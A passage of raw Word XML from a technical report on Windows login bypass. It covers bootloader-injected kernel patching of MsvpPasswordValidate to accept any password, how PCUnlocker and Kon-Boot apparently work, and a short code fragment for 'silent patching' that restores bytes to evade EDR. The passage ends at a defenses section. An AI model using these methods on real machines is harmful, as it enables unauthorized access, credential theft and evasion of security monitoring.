        </w:rPr>
        <w:t>User arrives at login screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE32A2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">User enters ANY password </w:t>
      </w:r>
      <w:r>
        <w:t>(or even a blank password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D9417A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">LSASS calls </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msv1_0.dll!MsvpPasswordValidate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="03B1B559" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The patched function immediately returns 0x00000000 (STATUS_SUCCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386CA82" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows grants access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7513B963" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="281" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>User is logged in with full privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBF4D7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="369"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Why This Works: The Fundamental Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ACA8E9" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The attack succeeds because of an architectural assumption in Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8AD17" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="498" w:right="2273"/>
      </w:pPr>
      <w:r>
        <w:t>“If code is executing in the kernel (Ring 0), it must have been validated through the boot chain. Therefore, any code or modifications made by ring 0 code is trustworthy.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627518E8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="275"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>By introducing malicious Ring 0 code before this assumption takes effect (via bootloader injection), we violate the premise and gain complete control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149560C" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="369"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Volatility: The Double-Edged Sword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576D510" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The attack is inherently volatile—all modifications exist only in RAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8A453" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Advantage 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Zero forensic artifacts on disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424D200" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Advantage 2: </w:t>
      </w:r>
      <w:r>
        <w:t>No modified system files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23993FA4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="2"/>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Advantage 3: </w:t>
      </w:r>
      <w:r>
        <w:t>System appears uncompromised to file-system integrity checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B30CC" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:right="1767" w:hanging="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Disadvantage: </w:t>
      </w:r>
      <w:r>
        <w:t>Attack is temporary (lost on reboot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F82207" w14:textId="2A24CC80" w:rsidR="00FC7A97" w:rsidRDefault="00000000" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="70"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>However, in a red-team scenario, even temporary access is valuable: - Extract sensitive data from disk - Dump active credentials from memory - Create persistent backdoors using legitimate system utilities - Access network resources with compromised credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DD8CC4" w14:textId="77777777" w:rsidR="00AD5226" w:rsidRDefault="00AD5226" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="70"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773E301F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="341" w:right="673" w:hanging="329"/>
      </w:pPr>
      <w:r>
        <w:t>Commercial Implementations: Theory Meets Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8FD57" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="275"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>The attack methodology is not purely theoretical—it forms the technical foundation for several commercial recovery utilities. Examining their implementations validates the theoretical analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C851377" w14:textId="77777777" w:rsidR="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PCUnlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: UEFI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ExitBootServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Implementation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C09F54" w14:textId="77777777" w:rsidR="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Overview: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>PCUnlocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is a paid software of which the main idea is exactly the same as in 2.1.2. local description</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547A603C" w14:textId="21FAACB7" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Implementation Details:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Locally a Windows PE (Preinstallation Environment) boot image is used which contains the exploit code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>ExitBootServices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> callback is registered during early boot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The payload is allocated in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>EfiRuntimeServicesData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> unsigned driver is loaded into the kernel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Signature, based function locating and patching is done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CAB10A" w14:textId="77777777" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF6C544" w14:textId="77777777" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Notable Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD57C1" w14:textId="7C5C178C" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:right="1767"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Its Bypass Mode operative in, memory patching (volatility)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE5896" w14:textId="1115FF22" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:right="1767"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Its Reset Mode operative offline SAM database modification (permanent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C95699" w14:textId="7B76F2A7" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:right="1767"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>The same way is implemented on both UEFI and legacy BIOS systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BF8D5" w14:textId="77777777" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3955E7A2" w14:textId="77777777" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>References: [4], [44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA40D31" w14:textId="77777777" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D2ADA9" w14:textId="5A886655" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>6.2 Kon, Boot: Silent Patching &amp; EDR Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA329D3" w14:textId="77777777" w:rsidR="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Overview: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Kon, Boot uses numerous additional stealth mechanisms and implements a concealed kernel patching technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B3CC3D" w14:textId="7369CB24" w:rsidR="00B44662" w:rsidRPr="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Implementation Details:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Uses legacy BIOS Int 13h hooking (Section 2.1.3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Very low impact kernel injection is implemented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DB134B" w14:textId="6C3C1514" w:rsidR="00B44662" w:rsidRDefault="00B44662" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Key innovation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Silent patching is performed, i.e. the original code bytes are put back right after successful login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">EDR (Endpoint Detection and Response) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>behavioral</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44662">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> signatures are hardly triggered if at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23334E4A" w14:textId="50B333E7" w:rsidR="00FC7A97" w:rsidRDefault="00E85008" w:rsidP="00B44662">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r w:rsidRPr="00E85008">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Silent Patching Mechanism</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F2C80" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// After successful login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326AE625" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>memcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FunctionAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>OriginalBytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>OriginalSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Restore original code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0BE366" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ZwFlushInstructionCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(...);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F9540" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="118" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// The function now appears unpatched to any analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD7FE1" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Why this is effective: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Most </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>behavioral</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detection systems look for functions being called with unexpected parameters or return values. By restoring the original code immediately after login succeeds, the patched function no longer appears anomalous to post-boot analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2749B881" w14:textId="54AC9EC3" w:rsidR="00FC7A97" w:rsidRDefault="00000000" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
      <w:r>
        <w:t>[45]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B96C55" w14:textId="77777777" w:rsidR="00AD5226" w:rsidRDefault="00AD5226" w:rsidP="00AD5226">
      <w:pPr>
        <w:spacing w:after="66" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5237ECC7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="341" w:right="673" w:hanging="329"/>
      </w:pPr>
      <w:r>
        <w:t>Defensive Mechanisms &amp; Their Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468365CF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="275"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attack methodology assumes certain pre-conditions. When these conditions are not met, the attack fails entirely. Understanding these </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
